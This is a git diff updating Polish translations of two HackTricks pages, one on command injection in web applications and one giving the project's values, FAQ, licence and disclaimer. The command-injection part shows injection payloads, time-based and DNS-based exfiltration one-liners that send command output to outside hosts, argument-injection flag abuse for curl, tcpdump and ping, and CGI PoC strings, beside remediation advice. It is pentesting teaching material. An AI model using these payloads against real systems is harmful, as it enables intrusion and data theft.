+++ b/src/pentesting-web/command-injection.md
@@ -4,11 +4,11 @@
 
 ## Czym jest command Injection?
 
-Atak **command injection** umożliwia wykonanie dowolnych poleceń systemu operacyjnego przez atakującego na serwerze hostującym aplikację. W efekcie aplikacja i wszystkie jej dane mogą zostać całkowicie skompromitowane. Wykonanie tych poleceń zazwyczaj pozwala atakującemu uzyskać nieautoryzowany dostęp lub kontrolę nad środowiskiem aplikacji i systemem, na którym działa.
+A **command injection** pozwala atakującemu na serwerze hostującym aplikację wykonać dowolne polecenia systemu operacyjnego. W rezultacie aplikacja oraz wszystkie jej dane mogą zostać całkowicie przejęte. Wykonanie tych poleceń zazwyczaj umożliwia atakującemu uzyskanie nieautoryzowanego dostępu lub kontroli nad środowiskiem aplikacji i systemem, na którym ona działa.
 
 ### Kontekst
 
-W zależności od tego, **gdzie jest wstrzykiwane twoje wejście**, może być konieczne **zakończenie kontekstu cytowania** (używając `"` lub `'`) przed poleceniami.
+W zależności od tego, **gdzie są wstrzykiwane Twoje dane wejściowe**, może być konieczne **zamknięcie kontekstu cytowania** (używając `"` lub `'`) przed dodaniem poleceń.
 
 ## Command Injection/Execution
 ```bash
@@ -30,10 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
 > /var/www/html/out.txt #Try to redirect the output to a file
 < /etc/passwd #Try to send some input to the command
 ```
-### **Ograniczenia** Bypasses
-
-Jeśli próbujesz wykonać **dowolne polecenia na maszynie linux**, zainteresuje Cię lektura na temat tych **Bypasses:**
+### **Ograniczenia** Obejścia
 
+Jeśli próbujesz wykonać **dowolne polecenia w maszynie linux**, zainteresuje Cię lektura o tych **obejściach:**
 
 {{#ref}}
 ../linux-hardening/bypass-bash-restrictions/
@@ -77,7 +76,7 @@ Poniżej znajduje się lista 25 najważniejszych parametrów, które mogą być
 ```
 ### Time based data exfiltration
 
-Wyodrębnianie danych: char by char
+Ekstrakcja danych: char by char
 ```
 swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 real    0m5.007s
@@ -91,7 +90,7 @@ sys 0m0.000s
 ```
 ### DNS based data exfiltration
 
-Opiera się na narzędziu z `https://github.com/HoLyVieR/dnsbin`, które jest również hostowane na dnsbin.zhack.ca
+Oparte na narzędziu z `https://github.com/HoLyVieR/dnsbin`, również hostowanym na dnsbin.zhack.ca
 ```
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
@@ -101,7 +100,7 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
-Narzędzia online do sprawdzania DNS based data exfiltration:
+Narzędzia online do sprawdzenia DNS based data exfiltration:
 
 - dnsbin.zhack.ca
 - pingb.in
@@ -122,7 +121,7 @@ powershell C:**2\n??e*d.*? # notepad
 
 ### Node.js `child_process.exec` vs `execFile`
 
-Podczas audytu backendów JavaScript/TypeScript często natrafisz na API Node.js `child_process`.
+Podczas audytu back-endów JavaScript/TypeScript często natkniesz się na API Node.js `child_process`.
 ```javascript
 // Vulnerable: user-controlled variables interpolated inside a template string
 const { exec } = require('child_process');
@@ -130,9 +129,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
 /* … */
 });
 ```
-`exec()` uruchamia **shell** (`/bin/sh -c`), dlatego każdy znak mający specjalne znaczenie dla shell (back-ticks, `;`, `&&`, `|`, `$()`, …) spowoduje **command injection**, gdy dane wejściowe użytkownika są konkatenowane w ciągu znaków.
+`exec()` uruchamia **shell** (`/bin/sh -c`), dlatego każdy znak mający specjalne znaczenie dla **shell** (back-ticks, `;`, `&&`, `|`, `$()`, …) spowoduje **command injection**, gdy dane wejściowe użytkownika są konkatenowane do ciągu znaków.
 
-**Środki zaradcze:** użyj `execFile()` (lub `spawn()` bez opcji `shell`) i przekazuj **każdy argument jako oddzielny element tablicy**, aby żaden shell nie był zaangażowany:
+**Zalecenie:** użyj `execFile()` (lub `spawn()` bez opcji `shell`) i podaj **każdy argument jako oddzielny element tablicy**, aby nie był używany **shell**:
 ```javascript
 const { execFile } = require('child_process');
 execFile('/usr/bin/do-something', [
@@ -140,25 +139,25 @@ execFile('/usr/bin/do-something', [
 '--payload', JSON.stringify(payload)
 ]);
 ```
-Real-world case: *Synology Photos* ≤ 1.7.0-0794 był podatny na atak przez nieautoryzowane zdarzenie WebSocket, które umieszczało dane kontrolowane przez atakującego w `id_user`, a następnie były one osadzane w wywołaniu `exec()`, co prowadziło do RCE (Pwn2Own Ireland 2024).
+Real-world case: *Synology Photos* ≤ 1.7.0-0794 było podatne na atak przez nieautoryzowane zdarzenie WebSocket, które umieszczało dane kontrolowane przez atakującego w `id_user`, które później zostały osadzone w wywołaniu `exec()`, osiągając RCE (Pwn2Own Ireland 2024).
 
 ### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
 
 Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
 
-Typical places where this appears:
+Typowe miejsca, w których się to pojawia:
 
-- Wbudowane web UIs/CGI handlers, które budują polecenia takie jak `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, itd.
-- Scentralizowane CGI routers (np. `/cgi-bin/<something>.cgi` z parametrem selektora takim jak `topicurl=<handler>`), gdzie wiele handlerów ponownie używa tego samego słabego walidatora.
+- Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc.
+- Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator.
 
-What to try:
+Co spróbować:
 
-- Podaj wartości zaczynające się od `-`/`--`, aby zostały potraktowane jako flagi przez narzędzie docelowe.
-- Nadużyj flag, które zmieniają zachowanie lub zapisują pliki, na przykład:
-  - `ping`: `-f`/`-c 100000` aby obciążyć urządzenie (DoS)
-  - `curl`: `-o /tmp/x` aby zapisać w dowolnej ścieżce, `-K <url>` aby załadować konfigurację kontrolowaną przez atakującego
-  - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` aby uzyskać wykonanie po rotacji (post-rotate) w niebezpiecznych wrapperach
-- Jeśli program obsługuje `--` jako koniec opcji, spróbuj obejść naiwną ochronę, która dopisuje `--` w niewłaściwym miejscu.
+- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool.
+- Abuse flags that change behavior or write files, for example:
+- `ping`: `-f`/`-c 100000` aby obciążyć urządzenie (DoS)
+- `curl`: `-o /tmp/x` aby zapisać do dowolnej ścieżki, `-K <url>` aby załadować konfigurację kontrolowaną przez atakującego
+- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` aby osiągnąć wykonanie po rotacji w niebezpiecznych wrapperach
+- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place.
 
 Generic PoC shapes against centralized CGI dispatchers:
 ```
@@ -178,7 +177,7 @@ topicurl=setEasyMeshAgentCfg&agentName=;id;
 https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
 {{#endref}}
 
-## Źródła
+## Referencje
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index 35f3d43ba..51aaed73f 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -1,21 +1,21 @@
-# Wartości HackTricks i FAQ
+# HackTricks Wartości i FAQ
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## Wartości HackTricks
 
 > [!TIP]
-> Oto **wartości projektu HackTricks**:
+> To są **wartości projektu HackTricks**:
 >
-> - Zapewnić **FREE** dostęp do **EDUCATIONAL hacking** zasobów dla **ALL** Internetu.
->  - Hacking polega na uczeniu się, a nauka powinna być możliwie jak najbardziej darmowa.
->  - Celem tej książki jest służenie jako kompleksowy zasób edukacyjny.
-> - **STORE** świetne **hacking** techniki publikowane przez społeczność, oddając **ORIGINAL** **AUTHORS** wszystkie **credits**.
->  - **We don't want the credit from other people**, chcemy po prostu przechowywać fajne sztuczki dla wszystkich.
->  - Publikujemy także **our own researches** w HackTricks.
->  - W kilku przypadkach opiszemy w HackTricks jedynie **podsumowanie najważniejszych części** techniki i **zachęcimy lektora do odwiedzenia oryginalnego wpisu** po więcej szczegółów.
-> - **ORGANIZE** wszystkie techniki **hacking** w książce, aby były **MORE ACCESSIBLE**
->  - Zespół HackTricks poświęcił tysiące godzin za darmo **wyłącznie na organizację treści**, aby ludzie mogli **uczyć się szybciej**
+> - Zapewnić **DARMOWY** dostęp do **EDUKACYJNYCH zasobów hacking** dla **CAŁEGO** Internetu.
+>  - Hacking polega na nauce, a nauka powinna być możliwie jak najbardziej darmowa.
+>  - Celem tej książki jest służyć jako kompleksowe **materiały edukacyjne**.
+> - **PRZECHOWYWAĆ** świetne techniki **hacking**, które publikuje społeczność, dając **ORYGINALNYM** **AUTOROM** wszystkie **zasługi**.
+>  - **Nie chcemy zabierać zasług innym**, chcemy tylko przechowywać fajne triki dla wszystkich.
+>  - Pisujemy także **własne badania** w HackTricks.
+>  - W kilku przypadkach napiszemy tylko **w HackTricks streszczenie ważnych części** techniki i **zachęcimy czytelnika do odwiedzenia oryginalnego posta** po więcej szczegółów.
+> - **ORGANIZOWAĆ** wszystkie techniki hacking w książce, aby były **BARDZIEJ DOSTĘPNE**
+>  - Zespół HackTricks poświęcił tysiące godzin za darmo **tylko na organizację treści**, aby ludzie mogli **uczyć się szybciej**
 
 <figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
 
@@ -23,35 +23,35 @@
 
 > [!TIP]
 >
-> - **Thank you so much for these resources, how can I thank you?**
+> - **Bardzo dziękuję za te zasoby, jak mogę Wam podziękować?**
 
-Możesz publicznie podziękować zespołowi HackTricks za udostępnienie tych zasobów, publikując tweet i wspominając [**@hacktricks_live**](https://twitter.com/hacktricks_live).\
-Jeśli jesteś szczególnie wdzięczny możesz również [**sponsor the project here**](https://github.com/sponsors/carlospolop).\
-I nie zapomnij dać gwiazdki projektom na GitHubie! (Linki znajdziesz poniżej).
+Możesz publicznie podziękować zespołowi HackTricks za udostępnienie wszystkich tych zasobów, publikując tweet i wspominając [**@hacktricks_live**](https://twitter.com/hacktricks_live).\
+Jeśli jesteś szczególnie wdzięczny możesz także [**sponsorować projekt tutaj**](https://github.com/sponsors/carlospolop).\
+I nie zapomnij **dać gwiazdki projektom Github!** (Znajdziesz linki poniżej).
 
 > [!TIP]
 >
-> - **How can I contribute to the project?**
+> - **Jak mogę przyczynić się do projektu?**
 
-Możesz **dzielić się nowymi tips and tricks ze społecznością lub naprawiać błędy**, które znajdziesz w książkach, wysyłając **Pull Request** do odpowiednich stron na Github:
+Możesz **dzielić się nowymi wskazówkami i trikami ze społecznością lub naprawiać błędy**, które znajdziesz w książkach, wysyłając **Pull Request** do odpowiednich stron Github:
 
 - [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
 - [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
 
-Nie zapomnij dać gwiazdki projektom na Githubie!
+Nie zapomnij **dać gwiazdki projektom Github!**
 
 > [!TIP]
 >
-> - **Can I copy some content from HackTricks and put it in my blog?**
+> - **Czy mogę skopiować część treści z HackTricks i zamieścić ją na moim blogu?**
 
-Tak, możesz, ale **nie zapomnij wspomnieć konkretnych link(ów)**, skąd pochodziła zawartość.
+Tak, możesz, ale **nie zapomnij podać konkretnego linku(-ów)**, z których pochodzi treść.
 
 > [!TIP]
 >
-> - **How can I reference a page of HackTricks?**
+> - **Jak mogę odnieść się do strony HackTricks?**
 
-Dopóki pojawi się link do strony/stron, z których wzięto informacje, to wystarczy.\
-Jeśli potrzebujesz bibtex możesz użyć czegoś takiego:
+Wystarczy, że pojawi się link **do** strony(-st), z której wzięto informacje.\
+Jeśli potrzebujesz bibtex, możesz użyć czegoś takiego:
 ```latex
 @misc{hacktricks-bibtexing,
 author = {"HackTricks Team" or the Authors name of the specific page/trick},
@@ -62,82 +62,82 @@ url = {\url{https://book.hacktricks.wiki/specific-page}},
 ```
 > [!WARNING]
 >
-> - **Czy mogę skopiować wszystkie HackTricks na mój blog?**
+> - **Can I copy all HackTricks in my blog?**
 
 **Wolałbym nie**. To **nie przyniesie korzyści nikomu**, ponieważ cała **zawartość jest już publicznie dostępna** w oficjalnych książkach HackTricks za darmo.
 
-Jeśli obawiasz się, że zniknie, po prostu zforkuj to na Github lub pobierz — jak już powiedziałem, jest już dostępne za darmo.
+Jeśli obawiasz się, że zniknie, po prostu zrób fork na Github lub pobierz ją — jak mówiłem, już jest darmowa.
 
 > [!WARNING]
 >
-> - **Dlaczego macie sponsorów? Czy książki HackTricks mają cele komercyjne?**
+> - **Why do you have sponsors? Are HackTricks books for commercial purposes?**
 
-Pierwsza **wartość** HackTricks to oferowanie **DARMOWYCH** edukacyjnych zasobów o hacking dla **CAŁEGO** świata. Zespół HackTricks poświęcił **tysiące godzin**, aby udostępnić te materiały, ponownie, **ZA DARMO**.
+Pierwsza wartość HackTricks to oferowanie **DARMOWYCH** materiałów edukacyjnych z zakresu hacking dla **CAŁEGO** świata. Zespół HackTricks poświęcił **tysiące godzin**, aby dostarczyć tę zawartość, ponownie, **ZA DARMO**.
 
-Jeśli myślisz, że książki HackTricks są tworzone w **celach komercyjnych**, to jesteś **CAŁKOWICIE W BŁĘDZIE**.
+Jeśli myślisz, że książki HackTricks są tworzone w celach **komercyjnych**, to jesteś **CAŁKOWICIE W BŁĘDZIE**.
 
-Mamy sponsorów, ponieważ nawet jeśli cała zawartość jest DARMOWA, chcemy **dać społeczności możliwość docenienia naszej pracy**, jeśli tego chcą. Dlatego oferujemy opcję przekazania wsparcia HackTricks poprzez [**Github sponsors**](https://github.com/sponsors/carlospolop), oraz dajemy **odpowiednim firmom z branży cybersecurity** możliwość sponsorowania HackTricks i umieszczania **niektórych reklam** w książce — **reklamy** są zawsze umieszczane w miejscach, w których są **widoczne**, ale **nie przeszkadzają w nauce**, jeśli ktoś skupia się na treści.
+Mamy sponsorów, ponieważ nawet jeśli cała zawartość jest DARMOWA, chcemy **dać społeczności możliwość docenienia naszej pracy**, jeśli tak zechce. W związku z tym oferujemy ludziom opcję wsparcia HackTricks za pośrednictwem [**Github sponsors**](https://github.com/sponsors/carlospolop), a także współpracujemy z **istotnymi firmami z branży cybersecurity**, które sponsorują HackTricks i umieszczają w książce **pewne reklamy** — reklamy zawsze są umieszczane w miejscach, które sprawiają, że są **widoczne**, ale **nie przeszkadzają w procesie nauki**, jeśli ktoś skupia się na treści.
 
-Nie znajdziesz HackTricks wypełnionego irytującymi reklamami jak inne blogi z dużo mniejszą zawartością niż HackTricks, ponieważ HackTricks nie jest tworzony w celach komercyjnych.
+Nie znajdziesz HackTricks wypełnionego irytującymi reklamami jak na innych blogach z o wiele mniejszą zawartością niż HackTricks, ponieważ HackTricks nie jest tworzony w celach komercyjnych.
 
 > [!CAUTION]
 >
-> - **Co zrobić, jeśli jakaś strona HackTricks jest oparta na moim wpisie na blogu, ale nie została do niej odniesiona?**
+> - **What should I do if some HackTricks page is based on my blog post but it isn't referenced?**
 
-**Bardzo przepraszamy. To nie powinno się zdarzyć**. Proszę, daj nam znać przez Github issues, Twitter, Discord... podaj link do strony HackTricks z treścią oraz link do twojego bloga i **sprawdzimy to i dodamy jak najszybciej**.
+**Bardzo przepraszamy. To nie powinno się zdarzyć.** Prosimy, daj nam znać przez Github issues, Twitter, Discord... podaj link do strony HackTricks z tą treścią oraz link do Twojego bloga i **sprawdzimy to i dodamy odnośnik ASAP**.
 
 > [!CAUTION]
 >
-> - **Co zrobić, jeśli treść z mojego bloga znajduje się w HackTricks i nie chcę jej tam mieć?**
+> - **What should I do if there is content from my blog in HackTricks and I don't want it there?**
 
-Zauważ, że posiadanie linków do twojej strony w HackTricks:
+Zauważ, że posiadanie linków do Twojej strony w HackTricks:
 
-- Poprawia twoje **SEO**
-- Zawartość jest **tłumaczona na ponad 15 języków**, co umożliwia większej liczbie osób dostęp do tej treści
-- **HackTricks zachęca** ludzi do **sprawdzenia twojej strony** (wiele osób wspomniało nam, że odkąd któraś z ich stron pojawiła się w HackTricks, otrzymują więcej odwiedzin)
+- Poprawia Twoje **SEO**
+- Treść jest **tłumaczona na ponad 15 języków**, co umożliwia większej liczbie osób dostęp do tej treści
+- **HackTricks zachęca** ludzi do **odwiedzenia Twojej strony** (wiele osób wspominało, że odkąd jakaś ich strona pojawiła się w HackTricks, otrzymują więcej odwiedzin)
 
-Jeśli mimo to chcesz, aby treść twojego bloga została usunięta z HackTricks, po prostu daj nam znać, a my **usunziemy każdy link do twojego bloga** i wszelką zawartość na nim opartą.
+Jednak jeśli nadal chcesz, aby treść z Twojego bloga została usunięta z HackTricks, po prostu daj nam znać, a **definitywnie usuniemy wszystkie linki do Twojego bloga** oraz wszelką treść opartą na nim.
 
 > [!CAUTION]
 >
-> - **Co zrobić, jeśli znajdę skopiowaną zawartość w HackTricks?**
+> - **What should I do if I find copy-pasted content in HackTricks?**
 
-Zawsze **przyznajemy oryginalnym autorom pełne zasługi**. Jeśli znajdziesz stronę ze skopiowaną zawartością bez podania źródła, daj nam znać, a my albo **usunemy ją**, **dodamy link przed tekstem**, albo **przepiszemy ją dodając link**.
+Zawsze **przyznajemy oryginalnym autorom wszelkie zasługi**. Jeśli znajdziesz stronę z kopiowaną treścią bez odwołania do źródła, daj nam znać, a my **usunemy ją**, **dodamy link przed tekstem** lub **przepiszemy treść dodając odnośnik**.
 
-## LICENSE
+## LICENCJA
 
-Copyright © Wszelkie prawa zastrzeżone, chyba że zaznaczono inaczej.
+Copyright © Wszystkie prawa zastrzeżone, chyba że określono inaczej.
 
-#### License Summary:
+#### Podsumowanie licencji:
 
-- Attribution: Masz prawo:
-- Share — kopiować i rozpowszechniać materiał w dowolnym medium lub formacie.
-- Adapt — remiksować, przekształcać i tworzyć na bazie materiału.
+- Uznanie autorstwa: Masz prawo do:
+- Share — kopiowania i rozpowszechniania materiału w dowolnym medium lub formacie.
+- Adapt — remiksowania, przekształcania i tworzenia na bazie materiału.
 
-#### Additional Terms:
+#### Dodatkowe warunki:
 
-- Third-Party Content: Niektóre części tego bloga/książki mogą zawierać treści pochodzące z innych źródeł, takie jak fragmenty z innych blogów lub publikacji. Wykorzystanie takich treści odbywa się zgodnie z zasadami fair use lub za wyraźną zgodą odpowiednich właścicieli praw autorskich. Prosimy o zapoznanie się z oryginalnymi źródłami w celu uzyskania informacji o konkretnych licencjach dotyczących treści stron trzecich.
-- Authorship: Oryginalne treści autorstwa HackTricks podlegają warunkom tej licencji. Zachęcamy do przypisywania autorstwa przy udostępnianiu lub adaptowaniu tej pracy.
+- Treści osób trzecich: Niektóre części tego bloga/książki mogą zawierać materiały pochodzące z innych źródeł, takie jak fragmenty z innych blogów lub publikacji. Korzystanie z takich materiałów odbywa się w ramach zasad dozwolonego użytku (fair use) lub za wyraźną zgodą odpowiednich właścicieli praw autorskich. Prosimy odwołać się do oryginalnych źródeł w celu uzyskania szczegółowych informacji na temat licencjonowania treści osób trzecich.
+- Autorstwo: Oryginalne treści napisane przez HackTricks podlegają warunkom tej licencji. Zachęcamy do przypisywania autorstwa przy udostępnianiu lub adaptowaniu tej pracy.
 
-#### Exemptions:
+#### Wyłączenia:
 
-- Commercial Use: W sprawach dotyczących komercyjnego wykorzystania tych treści, prosimy o kontakt.
+- Użytek komercyjny: W sprawach dotyczących komercyjnego wykorzystania tej zawartości, proszę o kontakt ze mną.
 
-Niniejsza licencja nie przyznaje żadnych praw do znaków towarowych ani do brandingu w związku z treścią. Wszystkie znaki towarowe i branding występujące w tym blogu/książce są własnością ich odpowiednich właścicieli.
+Niniejsza licencja nie przyznaje żadnych praw do znaków towarowych ani brandingowych związanych z treścią. Wszystkie znaki towarowe i elementy brandingu widoczne w tym blogu/książce są własnością ich odpowiednich właścicieli.
 
-**Korzystając z HackTricks, akceptujesz warunki tej licencji. Jeśli nie zgadzasz się z tymi warunkami, prosimy nie korzystać z tej strony.**
+**Korzystając z HackTricks lub uzyskując do niego dostęp, zgadzasz się przestrzegać warunków tej licencji. Jeśli nie zgadzasz się z tymi warunkami, prosimy nie uzyskiwać dostępu do tej witryny.**
 
-## **Disclaimer**
+## **Zrzeczenie odpowiedzialności**
 
 > [!CAUTION]
-> Ta książka, 'HackTricks', jest przeznaczona wyłącznie do celów edukacyjnych i informacyjnych. Zawartość tej książki jest udostępniona na zasadzie "as is", a autorzy i wydawcy nie składają żadnych oświadczeń ani gwarancji jakiegokolwiek rodzaju, wyraźnych ani dorozumianych, dotyczących kompletności, dokładności, wiarygodności, przydatności lub dostępności informacji, produktów, usług lub powiązanych grafik zawartych w tej książce. Każde poleganie na takich informacjach odbywa się wyłącznie na własne ryzyko.
+> Ta książka, 'HackTricks', ma charakter wyłącznie edukacyjny i informacyjny. Zawartość tej książki jest udostępniana w stanie "tak jak jest", a autorzy i wydawcy nie składają żadnych oświadczeń ani gwarancji jakiegokolwiek rodzaju, wyraźnych ani dorozumianych, co do kompletności, dokładności, wiarygodności, przydatności lub dostępności informacji, produktów, usług lub powiązanych grafik zawartych w tej książce. Jakiekolwiek poleganie na takich informacjach odbywa się wyłącznie na własne ryzyko.
 >
-> Autorzy i wydawcy w żadnym wypadku nie ponoszą odpowiedzialności za jakiekolwiek straty lub szkody, w tym bez ograniczeń, straty pośrednie lub wynikowe, ani za jakiekolwiek straty lub szkody powstałe w związku z utratą danych lub zysków wynikających z korzystania z tej książki.
+> Autorzy i wydawcy nie ponoszą w żadnym wypadku odpowiedzialności za jakiekolwiek straty lub szkody, w tym bez ograniczeń straty pośrednie lub wynikowe, ani za jakiekolwiek straty lub szkody wynikające z utraty danych lub zysków powstałych w związku z korzystaniem z tej książki.
 >
-> Ponadto techniki i wskazówki opisane w tej książce są podane wyłącznie w celach edukacyjnych i informacyjnych i nie powinny być wykorzystywane do działań nielegalnych lub złośliwych. Autorzy i wydawcy nie pochwalają ani nie wspierają żadnych działań niezgodnych z prawem lub nieetycznych, a wszelkie wykorzystanie informacji zawartych w tej książce odbywa się na własne ryzyko i odpowiedzialność użytkownika.
+> Ponadto techniki i wskazówki opisane w tej książce są dostarczane w celach edukacyjnych i informacyjnych i nie powinny być wykorzystywane do nielegalnych ani złośliwych działań. Autorzy i wydawcy nie popierają ani nie akceptują nielegalnych lub nieetycznych działań, a wszelkie wykorzystanie informacji zawartych w tej książce odbywa się na własne ryzyko i odpowiedzialność użytkownika.
 >
-> Użytkownik ponosi wyłączną odpowiedzialność za wszelkie działania podjęte na podstawie informacji zawartych w tej książce i powinien zawsze zasięgnąć profesjonalnej porady i pomocy przy próbach wdrażania jakichkolwiek opisanych technik lub wskazówek.
+> Użytkownik ponosi wyłączną odpowiedzialność za wszelkie działania podjęte na podstawie informacji zawartych w tej książce i powinien zawsze zasięgnąć profesjonalnej porady i pomocy przed próbą wdrożenia jakichkolwiek opisanych technik lub wskazówek.
 >
-> Korzystając z tej książki, użytkownik zgadza się zwolnić autorów i wydawców z wszelkiej odpowiedzialności za wszelkie szkody, straty lub krzywdy, które mogą wyniknąć z korzystania z tej książki lub jakichkolwiek informacji w niej zawartych.
+> Korzystając z tej książki, użytkownik zgadza się zwolnić autorów i wydawców z wszelkiej odpowiedzialności i obowiązków za wszelkie szkody, straty lub krzywdy, które mogą wyniknąć z korzystania z tej książki lub jakichkolwiek informacji w niej zawartych.
 
 {{#include ../banners/hacktricks-training.md}}